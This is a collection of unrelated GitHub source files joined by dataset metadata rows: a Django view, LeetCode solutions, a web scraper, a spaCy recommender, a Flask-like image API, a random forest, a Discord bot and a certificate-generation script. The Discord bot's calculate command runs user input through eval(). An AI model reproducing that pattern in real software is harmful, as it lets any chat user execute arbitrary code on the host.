    if(elapsed_time.seconds > 300):
        for p in parking_lots:
            parkingLot.objects.filter(lotName = p.lotName).update(lastUpdate=datetime.now(timezone.utc))
        updateTables()
    # get the parking lots longitude and latitude - needed since json encoding cannot encode Geoposition
    parking_lots_list = []
    for p in parking_lots:
        dictionary = {"lotName": p.lotName, "lat":p.lotPosition.latitude, "long":p.lotPosition.longitude}
        parking_lots_list.append(dictionary)
    parking_lots_json = json.dumps(parking_lots_list, cls=DjangoJSONEncoder)
    # static path for all of the images
    images = []
    for p in parking_lots:
        path = 'media/' + p.lotName + '_segmented.jpg'
        images.append(path)
    # get the parking spots longitude and latitude - needed since json encoding cannot encode Geoposition
    parking_spots_list = []
    for p in parking_spots:
        dictionary = {"lat":p.position.latitude, "long":p.position.longitude, "occupied":p.occupied}
        parking_spots_list.append(dictionary)
    parking_spots_json = json.dumps(parking_spots_list, cls=DjangoJSONEncoder) # turn parking_spots_list to json
    """
    # get occupied history for today
    today = date.today()
    spots_for_today = occupiedHistory.objects.filter(time__year=today.year,time__month=today.month, time__day=today.day)
    print(spots_for_today)
    todays_spots = []
    for s in spots_for_today:
        s_time = s.time.time()
        s_time = "{:02d}".format(s_time.hour) + ":" + "{:02d}".format(s_time.minute) + ":" + "{:02d}".format(int(s_time.second))
        todays_spots.append({"date":s_time, "total": s.totalSpots})
        # todays_spots.append({"time":str(s.time.time()), "total": s.totalSpots})
    todays_spots = json.dumps(todays_spots) # turn todays spots to json file
    """
    # return render of parking.html with context
    return render(request, 'parking/parking.html', context={"parking_lots":parkingLot.objects.all,
                                                            "parking_spots":parkingSpot.objects.all,
                                                            "images": images,
                                                            "parking_spots_json":parking_spots_json,
                                                            "parking_lots_json":parking_lots_json,
                                                            })
| RamseyV/Parking | views.py | views.py | py | 2,940 | python | en | code | 0 | github-code | 50 |
class Solution:
    def maxProfit(self, prices: List[int]) -> int:
        """
        Return the maximum profit from one buy-then-sell transaction.

        Single pass: track the lowest price seen so far and the best spread
        between the current price and that low. Returns 0 for an empty list
        or monotonically falling prices.

        Fixes: the original shadowed the builtins ``min``/``max`` and used a
        magic sentinel of 999999, which silently produced wrong answers for
        prices above that value; float('inf') is a correct initial minimum.
        """
        lowest = float('inf')
        best = 0
        for price in prices:
            if price < lowest:
                lowest = price
            elif price - lowest > best:
                best = price - lowest
        return best
class Solution:
    def maxProfit(self, prices: List[int]) -> int:
        """Best single-transaction profit; 0 when no profitable trade exists."""
        floor_price = int(1e9)
        best_gain = 0
        for price in prices:
            # Track the cheapest buy so far, then the widest spread above it.
            floor_price = min(floor_price, price)
            best_gain = max(best_gain, price - floor_price)
        return best_gain
| innjuun/Algorithm | LeetCode/easy/121.py | 121.py | py | 706 | python | en | code | 2 | github-code | 50 |
13885453082 | # -*- coding: utf-8 -*-
import scrapy
from bookparser.items import BookparserItem
class LabirintSpider(scrapy.Spider):
    """Scrapy spider crawling labirint.ru search results for programming books."""
    name = 'labirint'
    allowed_domains = ['labirint.ru']
    # Search query: "программирование" ("programming"), URL-encoded.
    start_urls = ['https://www.labirint.ru/search/%D0%BF%D1%80%D0%BE%D0%B3%D1%80%D0%B0%D0%BC%D0%BC%D0%B8%D1%80%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D0%B5/?available=1&wait=1&preorder=1&paperbooks=1&ebooks=1']
    def parse(self, response):
        """Follow every book link on the results page, then the next page."""
        book_links = response.xpath("//div[contains (@class, 'card-column')]/div/div/a[@class='product-title-link']/@href").extract()
        next_page = response.xpath("//a[@class='pagination-next__text']/@href").extract_first()
        for link in book_links:
            yield response.follow(link, callback=self.book_parse)
        yield response.follow(next_page, callback=self.parse)
    def book_parse(self, response):
        """Scrape one book page into a BookparserItem."""
        url = response.url
        title = response.xpath("//div[@id='product-title']/h1/text()").extract_first()
        authors = response.xpath("//div[@class='authors']/a[@data-event-label='author']/text()").extract()
        price = response.xpath("//span[@class='buying-priceold-val-number']/text()").extract_first()
        discount_price = response.xpath("//span[@class='buying-pricenew-val-number']/text()").extract_first()
        rating = response.xpath("//div[@id='rate']/text()").extract_first()
        yield BookparserItem(url=url,
                             title=title,
                             authors=authors,
                             price=price,
                             discount_price=discount_price,
                             rating=rating)
| sokolenkomikhail/data_collection | lesson_06/bookparser/spiders/labirint.py | labirint.py | py | 1,696 | python | en | code | 0 | github-code | 50 |
10965043853 | from modulos.bd.servicios import Servicios_BD
from modulos.base.modelo import ModeloBase
from modulos.base.servicios import ServiciosBase
#cli_services=CLIservices()
#cliente_n1=cli_services.prompt_cliente()
base_datos=Servicios_BD()
conexion=base_datos.conexion_bd()
Servicios_Base=ServiciosBase()
"""
-tenemos objeto ModeloBase que es un object
-Para por ejemplo guardar eso en la base de datos
"""
#cliente=ModeloBase('Richard','Coleman','rickycole@gmail.com','3434568689')
#Esto no funciona porque las clases abstractas no se instancian directamente
class Cliente(ModeloBase):
    """Concrete client record; ModeloBase itself is abstract and cannot be instantiated."""
    # NOTE(review): fields are annotated `str` but default to None — consider
    # Optional[str] if the project moves to strict typing.
    nombre:str=None
    apellido:str=None
    email:str=None
    telefono:str=None
class CLIservices:
    def prompt_cliente(self) -> Cliente:
        """Interactively read client fields from stdin and return a populated Cliente."""
        cliente = Cliente()
        for field in ("nombre", "apellido", "email", "telefono"):
            setattr(cliente, field, input(f"{field}: "))
        return cliente
#nuevo_proveedor="INSERT INTO proveedores(nombre,email,telefono) VALUES ('RocioSRL','iguana@gmail.com','4356978')"
#nuevo=base_datos.operacion_escritura(nuevo_proveedor)
consulta='select * from proveedores'
results=base_datos.operacion_lectura(consulta)
print(results)#Lista de diccionarios
#item to row objeto a fila (registro)
#row to sql fila a string sql
#row to item fila a objeto
#TypeError: Can't instantiate abstract class ServiciosBase with abstract methods fila_a_item, fila_a_sql, item_a_fila
class ejemplo(ModeloBase):
    """Minimal ModeloBase subclass used below to exercise ServiciosBase.item_a_fila."""
    nombre:str=None
    apellido:str=None
instancia=ejemplo()
instancia.nombre="Lore"
instancia.apellido="Ope"
objeto_1=Servicios_Base.item_a_fila(instancia) | RocioDure12/Tienda_app | main.py | main.py | py | 1,647 | python | es | code | 0 | github-code | 50 |
3436893210 | import spacy
nlp = spacy.load('en_core_web_md')
description = """Will he save
their world or destroy it? When the Hulk becomes too dangerous for the
Earth, the Illuminati trick Hulk into a shuttle and launch him into space to a
planet where the Hulk can live in peace. Unfortunately, Hulk land on the
planet Sakaar where he is sold into slavery and trained as a gladiator."""
# Movie description for comparisons.
def watch_next(info):
    """
    Return the title of the stored movie whose description is most similar
    to *info*, using spaCy document similarity.

    Fixes a resource leak: the original opened movies.txt and never closed it.
    """
    with open("movies.txt", "r") as movies:
        # Each line is "Title:Description" — split into [title, description].
        split_movie_list = [line.split(':') for line in movies]
    target_doc = nlp(info)
    # Similarity between *info* and each stored movie description.
    sim_list = [nlp(entry[1]).similarity(target_doc) for entry in split_movie_list]
    # Index of the most similar description wins.
    best_index = sim_list.index(max(sim_list))
    return split_movie_list[best_index][0]
print("We recommend you watch this next: " + watch_next(description))
# Print a recommendation for the movie in the .txt file with the highest similarity to the watched movie. | Yelya8/Watch_next.py | watch_next.py | watch_next.py | py | 1,689 | python | en | code | 0 | github-code | 50 |
74067656154 | from typing import Dict, List, Union
from multimodal_challenge.multimodal_object_init_data import MultiModalObjectInitData
class DatasetTrial:
"""
Parameters for defining a trial for dataset generation.
"""
def __init__(self, target_object: MultiModalObjectInitData, force: Dict[str, float],
magnebot_position: Dict[str, float],
target_object_position: Dict[str, float],
distractors: List[Union[dict, MultiModalObjectInitData]]):
"""
:param target_object: [`MultiModalObjectInitData` initialization data](multimodal_object_init_data.md) for the target object.
:param force: The initial force of the target object as a Vector3 dictionary.
:param magnebot_position: The initial position of the Magnebot.
:param target_object_position: The final position of the target object.
:param distractors: Initialization data for the distractor objects.
"""
# Load the drop parameters from a dictionary.
if isinstance(target_object, dict):
target_object: dict
""":field
target_object: [`MultiModalObjectInitData` initialization data](multimodal_object_init_data.md) for the target object.
"""
self.target_object = MultiModalObjectInitData(**target_object)
else:
self.target_object: MultiModalObjectInitData = target_object
""":field
The initial force of the target object as a Vector3 dictionary.
"""
self.force: Dict[str, float] = force
""":field
The initial position of the Magnebot.
"""
self.magnebot_position: Dict[str, float] = magnebot_position
""":field
The final position of the target object.
"""
self.target_object_position: Dict[str, float] = target_object_position
""":field
Initialization data for the distractor objects.
"""
self.distractors: List[MultiModalObjectInitData] = [d if isinstance(d, MultiModalObjectInitData) else
MultiModalObjectInitData(**d) for d in distractors]
| chuangg/find_fallen_objects | docker/multimodal_challenge/dataset/dataset_trial.py | dataset_trial.py | py | 2,192 | python | en | code | 6 | github-code | 50 |
26148197365 | from math import log,exp,ceil
from sys import stdin
r = stdin.readline
# UVA 113 "Power of Cryptography": for each (n, p) pair, print the integer k
# such that k**n == p. Input ends at EOF (empty read).
n = r().strip()
eps = 1e-6  # tolerance for deciding the float root is really the next integer
while n!="":
    n = int(n)
    p = int(r().strip())
    try:
        # k = p**(1/n), computed in log space to avoid overflow for huge p.
        sol = exp(log(p)/n)
        csol = ceil(sol)
        if csol-sol<eps:
            print(csol)
        else:
            print(round(sol))
    except ValueError:
        # log(p) raised a domain error (p == 0), whose n-th root is 0 == p.
        print(p)
    n = r().strip()
| michaelgy/PROBLEMS_PROGRAMMING | UVA/113.py | 113.py | py | 375 | python | en | code | 0 | github-code | 50 |
36537975361 | from bottle import route, run, request, response, HTTPResponse
from rembg import remove
import io
import json
import tempfile
import os
@route('/detourer_image', method='POST')
def detourer_image():
    """
    POST endpoint: strip the background from the uploaded 'image' file with
    rembg and return the result as a PNG attachment.

    Returns a 400 JSON error when no file named 'image' was uploaded.
    """
    if 'image' not in request.files:
        error_response = {'error': 'Pas d\'image envoyée'}
        return HTTPResponse(body=json.dumps(error_response), status=400, content_type='application/json')
    image = request.files.get('image')
    # Spool the upload to a named temporary file so it can be re-read from disk.
    with tempfile.NamedTemporaryFile(delete=False, suffix='.png') as img_temp:
        img_temp.write(image.file.read())
        img_temp.flush()
        img_temp_path = img_temp.name
    try:
        with open(img_temp_path, 'rb') as img_file:
            img_result_bytes = io.BytesIO(remove(img_file.read()))
    finally:
        # Always delete the temp file, even if background removal fails
        # (the original leaked it on error).
        os.remove(img_temp_path)
    response.content_type = 'image/png'
    response.set_header('Content-Disposition', 'attachment; filename=result.png')
    return img_result_bytes.getvalue()
if __name__ == '__main__':
    # Listen on all interfaces; debug mode enables tracebacks in responses.
    run(host='0.0.0.0', port=8080, debug=True)
| SCcagg5/remove_background | api.py | api.py | py | 1,008 | python | en | code | 0 | github-code | 50 |
75165252956 | from MachineLearning.DT_Model.CART import LeafNode
from MachineLearning.DT_Model.CART import TreeNode
from MachineLearning.DT_Model.CART import CART
import random
import matplotlib.pyplot as plt
import numpy as np
class Forest:
    """Random forest of CART trees trained by bagging on `frame`, predicting
    the binary label column `col` by majority vote."""
    def __init__(self, frame, col):
        self.set = []  # roots of the trained trees
        self.frame = frame  # training DataFrame
        self.col = col  # label column name
        self.cart = CART(frame=frame, col=col)  # helper providing Gini utilities
    '''
    绘制森林及分类点散点图(分类属性为2的情况下)
    '''
    # Draw the forest's decision regions plus a scatter of the samples
    # (only meaningful when there are exactly two feature attributes).
    def drawPicture(self):
        att = []
        for each in self.frame:
            if each != self.col:
                att.append(each)
        bFrame = self.frame.loc[self.frame[self.col] == 1]  # positive samples
        sFrame = self.frame.loc[self.frame[self.col] == 0]  # negative samples
        plt.rcParams['font.sans-serif'] = ['KaiTi']  # CJK-capable default font
        plt.rcParams['axes.unicode_minus'] = False  # render minus signs correctly
        plt.scatter(x=bFrame[att[0]],y=bFrame[att[1]],marker="+",s=100)
        plt.scatter(x=sFrame[att[0]],y=sFrame[att[1]],marker="*",s=100)  # scatter plot
        self.plot_decision_boundary()  # classification regions
        plt.title("随机森林的分类结果图")
        plt.xlabel(att[0])
        plt.ylabel(att[1])
        plt.savefig("随机森林的分类结果图.png")
        plt.show()
    '''
    绘制决策边界的函数
    '''
    # Plot the decision boundary by scanning a grid over the two features.
    # NOTE(review): the feature names "密度"/"含糖率" are hard-coded here while
    # drawPicture derives them generically — confirm they always match.
    def plot_decision_boundary(self):
        X = self.frame["密度"]
        Y = self.frame["含糖率"]
        # Grid bounds with a small margin around the data.
        x_min, x_max = min(X) - 0.1, max(X) + 0.1
        y_min, y_max = min(Y) - 0.1, max(Y) + 0.1
        h = 0.005
        # Grid coordinates over the plot area.
        xx, yy = np.arange(x_min, x_max, h), np.arange(y_min, y_max, h)
        for i in range(0, len(yy)):
            tem = self.predict(obj={"密度": xx[0], "含糖率": yy[i]})
            startx = 0
            for j in range(1, len(xx)):
                temp = self.predict(obj={"密度": xx[j], "含糖率": yy[i]})
                if temp != tem:
                    plt.plot([xx[startx], xx[j]], [yy[i], yy[i]], c="g" if tem >= 0 else "r", linewidth=1)
                    tem = temp
                    startx = j
                if j == len(xx) - 1:
                    plt.plot([xx[startx], xx[j]], [yy[i], yy[i]], c="g" if tem >= 0 else "r", linewidth=1)
    '''
    工具函数,根据给出的字典{value:nums}找出出现次数(nums)最多的值(value)
    @:param dic 字典
    '''
    # Utility: return the key with the highest count in a {value: count} dict.
    # NOTE(review): shadows the builtin `max` inside the method body.
    def getMode(self, dic):
        xmean = 0
        max = 0
        for each in dic.keys():
            if dic[each] > max:
                xmean = each
                max = dic[each]
        return xmean
    '''
    工具函数,根据给出的列表获取其出现次数字典
    @:param list 列表
    '''
    # Utility: build a {value: occurrence-count} dict from a list.
    def getDic(self, lines):
        dic = {}
        for each in lines:
            if each in dic.keys():
                dic[each] += 1
            else:
                dic[each] = 1
        return dic
    '''
    绘制每棵树的预测结果
    '''
    # Collect a tree's split thresholds into `lines` ({"x": [...], "y": [...]})
    # according to which feature each internal node splits on.
    def generateLine(self, root, lines, xName, yName):
        if str(type(root)) != "<class 'MachineLearning.DT_Model.CART.LeafNode'>":
            if root.name == xName:
                lines["x"].append(root.value)
                self.generateLine(root.lchild, lines, xName, yName)
                self.generateLine(root.rchild, lines, xName, yName)
            else:
                lines["y"].append(root.value)
                self.generateLine(root.lchild, lines, xName, yName)
                self.generateLine(root.rchild, lines, xName, yName)
    '''
    生成森林
    '''
    # Train 13 trees, each on a bootstrap sample of half the dataset size
    # (sampling row indices with replacement).
    def generateForest(self):
        for i in range(0, 13):
            set = []
            for i0 in range(0, len(self.frame)//2):
                set.append(random.randint(0, len(self.frame) - 1))
            table = self.frame.iloc[set]
            self.set.append(self.generateTree(table))
    '''
    根据训练出来的随机森林做预测
    '''
    # Majority vote over all trees: each tree votes -1 (label 0) or +1
    # (any other label); the signed vote sum is returned.
    def predict(self, obj):
        sum = 0
        for each in self.set:
            it = int(self.preTree(obj, root=each))
            if it == 0:
                sum -= 1
            else:
                sum += 1
        return sum
    '''
    根据单个决策树进行预测
    '''
    # Walk a single tree: go left when the attribute value is >= the node's
    # split threshold, right otherwise, until a leaf is reached.
    def preTree(self, obj, root):
        node = root
        while str(type(node)) != "<class 'MachineLearning.DT_Model.CART.LeafNode'>":
            if obj[node.name] >= node.value:
                node = node.lchild
            else:
                node = node.rchild
        return node.val
    '''
    连续的最优划分属性试探法
    '''
    # Exhaustively test every (attribute, threshold) pair and return the
    # [value, name] pair minimising the weighted Gini index.
    def bestAttri(self, table):
        sumMin = 100
        recordValue = None
        recordName = None
        if len(table) == 0:
            return [None,None]
        for each in table:
            if each != self.col:
                # For each candidate threshold, numsTable = {value: frequency}.
                numsTable = self.cart.calFrequ(table, each)
                for value in numsTable:
                    valueGini = numsTable[value] / len(table) * self.cart.Gini(table.loc[table[each] >= value]) + (
                            1 - numsTable[value]) * self.cart.Gini(table.loc[table[each] < value])
                    if valueGini < sumMin:
                        sumMin = valueGini
                        recordValue = value
                        recordName = each
        return [recordValue, recordName]
    '''
    根据所给表格生成一棵树的算法
    '''
    # Recursively grow a CART tree from `table`.
    def generateTree(self, table):
        # Find the best split as [threshold, attribute].
        list = self.bestAttri(table)
        # Pure node: emit a leaf directly.
        if self.cart.isLeafNode(table):
            return LeafNode(table.iloc[0][self.col])
        # The best split cannot separate the table any further.
        if self.cart.canNotDevide(table, list):
            for i in range(0, len(table)):
                if table.iloc[i][list[1]] == list[0]:
                    return LeafNode(table.iloc[i][self.col])
        left = table.loc[table[list[1]] >= list[0]]
        right = table.loc[table[list[1]] < list[0]]
        # Otherwise recurse into an internal node.
        return TreeNode(self.generateTree(left),
                        self.generateTree(right), list[1], list[0])
9309106724 | import io
import discord
from discord import app_commands
from discord.ext import commands, tasks
from discord.ui import Select, View
from files import texts, goobers, lang_codes, quote_translation
import requests
import random
from datetime import datetime
import pytz
from PIL import Image, ImageDraw
import inflect
import os
from dotenv import load_dotenv
load_dotenv()
p = inflect.engine()
# more functionality, but it's still kinda messy
bot = commands.Bot(command_prefix="/", intents=discord.Intents.all())
@bot.event
async def on_ready():
    """Log startup, sync the slash-command tree, and start the scheduled task."""
    print(f"{bot.user} is now running!")
    try:
        synced = await bot.tree.sync()
        print(f"Synced {len(synced)} command(s)")
    except Exception as e:
        print(e)
    papiez.start()
@tasks.loop(seconds=60)
async def papiez():
    """Every minute, check Polish local time and post "papiez" at exactly 21:37."""
    channel = bot.get_channel(1034863959964143666)  # hard-coded target channel id
    pl_date = datetime.now(pytz.timezone('Poland'))
    pl_time = pl_date.strftime('%H:%M')
    if pl_time == "21:37":
        await channel.send("papiez")
@bot.event
async def on_message(message):
    """React with a heart to media posts in bot-commands; reply to 'cool'."""
    # Ignore the bot's own messages to avoid reacting to itself.
    if message.author == bot.user:
        return
    lst = [1034863959964143666] # bot-commands id
    if message.channel.id in lst:
        if message.embeds or message.attachments:
            await message.add_reaction('❤')
            return
    if message.content == 'cool':
        await message.channel.send("you too")
        return
@bot.tree.command(name="hello")
async def hello(interaction: discord.Interaction):
await interaction.response.send_message(f"Hey {interaction.user.mention}!")
@bot.tree.command(name="icecream", description="testing timeouts")
async def icecream(interaction: discord.Interaction):
select = Select(
placeholder="Choose a flavor",
options=[
discord.SelectOption(label="vanilla", emoji="🤍", description="yum"),
discord.SelectOption(label="choco", emoji="🍫", description="yum"),
discord.SelectOption(label="strawberry", emoji="🍓", description="yum")]
)
view = View(timeout=30)
view.add_item(select)
async def my_callback(interaction):
await interaction.response.edit_message(content=f"Awesome, I like {select.values[0]} too!", view=view)
select.callback = my_callback
await interaction.response.send_message(view=view)
@bot.tree.command(name="embed", description="for testing embed designs")
async def embed(interaction: discord.Interaction):
embed = discord.Embed(
title="Quote:",
description="wise words",
color=0x000000)
embed.set_author(
name="John Paul the 2nd",
icon_url="https://cdn.discordapp.com/emojis/934972840594264104.webp?size=96&quality=lossless")
embed.add_field(
name="Quote translation:",
value=f"wise words(in english)",
inline=True)
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="popequote", description="pope John Paul the 2nd's wisdom")
async def pope_quote(interaction: discord.Interaction):
quote = random.choice(list(quote_translation))
embed = discord.Embed(
title="Quote:",
description=f"*{quote}*",
color=0x000000)
embed.set_author(
name="John Paul the 2nd",
icon_url="https://media.discordapp.net/attachments/1060711805028155453/1060713256576106606/sc2.png?width=390&height=390")
embed.add_field(
name="Quote translation:",
value=f"*{quote_translation[quote]}*",
inline=True)
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="fox", description="get a random fox")
async def fox(interaction: discord.Interaction):
foxer = requests.get("https://randomfox.ca/floof").json()
await interaction.response.send_message(foxer["image"])
@bot.tree.command(name="what", description="what?")
async def what(interaction: discord.Interaction):
await interaction.response.send_message(random.choice(texts))
@bot.tree.command(name="goober", description="Goofy Goobers Generator!")
async def goober(interaction: discord.Interaction):
await interaction.response.send_message(random.choice(goobers))
@bot.tree.command(name="calculate", description="lol math")
@app_commands.describe(expression="Type help for help")
async def calc(interaction: discord.Interaction, expression: str):
if expression.lower() == "help":
await interaction.response.send_message(f"Here's your help message") # could be an embed instead of a text msg
else:
try:
await interaction.response.send_message(f"{expression} = {eval(expression)}")
except:
await interaction.response.send_message(f"that's too ugly")
@bot.tree.command(name="say")
@app_commands.describe(thing_to_say="What should I say?")
async def say(interaction: discord.Interaction, thing_to_say: str):
await interaction.response.send_message(f"{interaction.user.name} said: `{thing_to_say}`")
@bot.tree.command(name="translate", description="translate stuff lol")
@app_commands.describe(translate_from="translate from:", translate_to="translate to:", message="the message you want to translate:")
async def translate(interaction: discord.Interaction, translate_from: str, translate_to: str, message: str):
first = translate_from.lower()
second = translate_to.lower()
if first not in lang_codes and second not in lang_codes:
await interaction.response.send_message(f"Sorry, I don't recognize either of those as languages", ephemeral=True)
return
if first not in lang_codes:
await interaction.response.send_message(f"Sorry, I don't recognize **{first}** as a language", ephemeral=True)
return
if second not in lang_codes:
await interaction.response.send_message(f"Sorry, I don't recognize **{second}** as a language", ephemeral=True)
return
url = "https://translated-mymemory---translation-memory.p.rapidapi.com/get"
querystring = {
"langpair": lang_codes[first] + "|" + lang_codes[second],
"q": message,
"mt": "1",
"onlyprivate": "0",
"de": "a@b.c"}
headers = {
"X-RapidAPI-Key": os.getenv('translation_key'),
"X-RapidAPI-Host": "translated-mymemory---translation-memory.p.rapidapi.com"}
response = requests.request("GET", url, headers=headers, params=querystring).json()
translated_msg = response['responseData']['translatedText']
# print(response) # for debugging
# print(translated_msg)
if response['quotaFinished'] is None:
await interaction.response.send_message(f"One of those languages flew out of my head...", ephemeral=True)
return
embed = discord.Embed(
color=0x000000)
embed.set_author(
name="Translation",
icon_url="https://cdn.discordapp.com/emojis/934972840594264104.webp?size=96&quality=lossless")
embed.add_field(
name=f"From {first}:",
value=message,
inline=True)
embed.add_field(
name=f"To {second}:",
value=translated_msg,
inline=True)
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="palette", description="Get a random color palette")
async def palette(interaction: discord.Interaction):
# create an image with a black background
wide = 300
tall = int(wide/5)
image = Image.new('RGB', (wide, tall), (0, 0, 0))
draw = ImageDraw.Draw(image)
# get 5 random colors
url = "http://colormind.io/api/"
data = {"model": "default"}
response = requests.post(url, json=data).json()
colors = response["result"]
colors_better = [tuple(x) for x in colors]
# draw rectangles with the random colors on the image
x, y = 0, 0
width, height = wide/5, tall
for color in colors_better:
draw.rectangle((x, y, x+width, y+height), fill=color)
x += width
# save the image to a file-like object
image_data = io.BytesIO()
image.save(image_data, 'PNG')
image_data.seek(0)
# send the image data as an attachment
message = await bot.get_channel(1061811267834224649).send(file=discord.File(image_data, 'color_palette.png'))
# get the url of the image from the message attachments
image_url = message.attachments[0].url
# send the image url in an embed
embed = discord.Embed()
embed.set_author(
name="Here's your random color palette:",
icon_url="https://media.discordapp.net/attachments/1060711805028155453/1061825040716402731/logo_beter.png")
embed.set_image(
url=image_url)
embed.set_footer(
text="Generated with colormind.io")
# gg
await interaction.response.send_message(embed=embed)
@bot.tree.command(name="serverinfo", description="Information about the server!")
async def serverinfo(interaction: discord.Interaction):
    """Post an embed summarizing the guild: owner, co-owners, member and
    channel counts, roles, and the creation date."""
    role_list = [str(role.name) for role in interaction.guild.roles if role.name != "@everyone"]
    co_owner_role = interaction.guild.get_role(1001472749711147040)  # guild-specific "co-owner" role id
    creation_time = interaction.guild.created_at
    # get_role() returns None when the role does not exist, in which case
    # .members raises AttributeError (was a bare except that hid everything).
    try:
        co_owners = ", ".join(str(member) for member in co_owner_role.members if member != interaction.guild.owner)
    except AttributeError:
        co_owners = "Nobody!"
    embed = discord.Embed(
        title="Server information",
        description=f"""🔹**Name:** {interaction.guild.name}
                    🔹**Id:** {interaction.guild.id}
                    🔹**Owner:** {interaction.guild.owner}
                    🔹**Co-owner(s):** {co_owners}""",
        color=0x397fbf)
    embed.add_field(
        name="Members:",
        value=f"""🔹**All:** {len(interaction.guild.members)}
                🔹**Online:** {sum(member.status!=discord.Status.offline for member in interaction.guild.members)}""",
        inline=True)
    embed.add_field(
        name="Channels:",
        value=f"""🔹**Text:** {len(interaction.guild.text_channels)}
                🔹**Voice:** {len(interaction.guild.voice_channels)}""",
        inline=True)
    embed.add_field(
        name=f"Roles ({len(role_list)}):",
        value=", ".join(role_list),
        inline=False)
    # Guilds without an icon have guild.icon == None; skip the thumbnail then.
    try:
        icon_url = interaction.guild.icon.url
        embed.set_thumbnail(url=icon_url)
    except AttributeError:
        pass
    embed.set_footer(
        # ordinal day (1st/2nd/...) comes from the inflect engine `p`
        text=f"""Server creation date: {creation_time.strftime(f'{p.ordinal(creation_time.strftime("%d"))} %B %Y')}""")
    await interaction.response.send_message(embed=embed)
@bot.tree.command(name="botinfo", description="Info about the bot")
async def botinfo(interaction: discord.Interaction):
    """Post an embed with the bot's owner, library version, and creation date."""
    creation_time = bot.user.created_at
    bot_info = await bot.application_info()
    owner = bot_info.owner
    embed = discord.Embed(
        title=f"{bot.user}",
        description=f"{bot.user.name} knows much, tells some. {bot.user.name} knows many things others do not. {bot.user.name} wishes you well.",
        color=0x397fbf)
    embed.set_thumbnail(
        url=f"{bot.user.avatar.url}")
    embed.add_field(
        name="Dev:",
        value=f"{owner.name}#{owner.discriminator}",
        inline=True)
    embed.add_field(
        name="Library:",
        value=f"discord.py version {discord.__version__}",
        inline=True)
    embed.set_footer(
        # ordinal day (1st/2nd/...) comes from the inflect engine `p`
        text=f"""Creation date: {creation_time.strftime(f'{p.ordinal(creation_time.strftime("%d"))} %B %Y')}""")
    await interaction.response.send_message(embed=embed)
@bot.tree.command(name='choices')
# Bug fix: the keys passed to describe()/choices() must match the callback
# parameter name.  The original used "optionlol" while the parameter is
# "option", which makes discord.py raise TypeError at import time.
@app_commands.describe(option="pick a weather")
@app_commands.choices(option=[
    app_commands.Choice(name="rainy", value="why do I need this"),
    app_commands.Choice(name="cloudy", value="why do I need this")
])
async def test(interaction: discord.Interaction, option: app_commands.Choice[str]):
    """Demo slash command with a fixed choice list; echoes the picked name."""
    await interaction.response.send_message(f"You chose: {option.name}")
bot.run(os.getenv('bot_key'))
| s00240122/Python-tings | YTTutorialDiscBot/slash_bot.py | slash_bot.py | py | 11,903 | python | en | code | 0 | github-code | 50 |
11982603493 | #Cryptographie appliquée
#Projet n°2: PKI et Python
#Auteur: Guillaume Paris
#Date: 07-11-2022
#Description: Ce programme permet de créer une autorité racine, une autorité d'enregistrement et un certificat client signé par l'autorité racine et l'autorité d'enregistrement.
import datetime
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa, dsa, ec
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
# Choose the signature hash algorithm (user input; SHA1 is kept for the
# exercise even though it is obsolete for new signatures).
si=input("Choisir l'algorithme de signature: 1 pour SHA1, 2 pour SHA256\n")
if si=="1":
    signature=hashes.SHA1()
elif si=="2":
    signature=hashes.SHA256()
else:
    print("Erreur de saisie")
    exit()
# Choose the key algorithm and generate the private key (user input).
cipher=input("Choisir l'algorithme de chiffrement: 1 pour DSA, 2 pour RSA ou 3 pour ECDSA \n")
if cipher=="1":
    key = dsa.generate_private_key(key_size=2048, backend=default_backend())
elif cipher=="2":
    key = rsa.generate_private_key( public_exponent=65537, key_size=2048, backend=default_backend())
elif cipher=="3":
    key = ec.generate_private_key(ec.SECP384R1(), default_backend())
else:
    print("Erreur de saisie")
    exit()
# Create the root authority: self-signed certificate and its private key.
# NOTE(review): the same key pair is reused below for the CSR and the client
# certificate, so all three artifacts share one key -- confirm that is the
# intended simplification for this exercise.
if not os.path.exists("autorite_racine"):
    os.makedirs("autorite_racine")
with open("autorite_racine/private_key.pem", "wb") as f:
    f.write(key.private_bytes( encoding=serialization.Encoding.PEM,
    format=serialization.PrivateFormat.TraditionalOpenSSL,
    encryption_algorithm=serialization.NoEncryption()))
with open("autorite_racine/certificat_racine.pem", "wb") as f:
    subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"FR"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"France"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"Paris"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"ESIEA"),
    x509.NameAttribute(NameOID.COMMON_NAME, u"Guillaume Paris"),
    ])
    certificat_racine = x509.CertificateBuilder().subject_name(subject
    ).issuer_name(issuer
    ).public_key(key.public_key()
    ).serial_number(x509.random_serial_number()
    ).not_valid_before(datetime.datetime.utcnow()
    ).not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=10)
    ).sign(key, signature, default_backend())
    f.write(certificat_racine.public_bytes(serialization.Encoding.PEM))
# Create the registration authority: a certificate signing request (CSR).
if not os.path.exists("autorite_enregistrement"):
    os.makedirs("autorite_enregistrement")
with open("autorite_enregistrement/demande_certificat.pem", "wb") as f:
    subject = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"Etats-Unis"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"Milwaukee"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"Université de Milwaukee"),
    x509.NameAttribute(NameOID.COMMON_NAME, u"Bill Miller"),
    ])
    demande = x509.CertificateSigningRequestBuilder().subject_name(subject
    ).sign(key, signature, default_backend())
    f.write(demande.public_bytes(serialization.Encoding.PEM))
# Create a client certificate signed by the root authority, taking the
# subject from the CSR.
certificat = x509.CertificateBuilder().subject_name(demande.subject
).issuer_name(certificat_racine.subject
).public_key(key.public_key()
).serial_number(x509.random_serial_number()
).not_valid_before(datetime.datetime.utcnow()
).not_valid_after(datetime.datetime.utcnow() + datetime.timedelta(days=10)
).sign(key, signature, default_backend())
with open("certificat.pem", "wb") as f:
    f.write(certificat.public_bytes(serialization.Encoding.PEM))
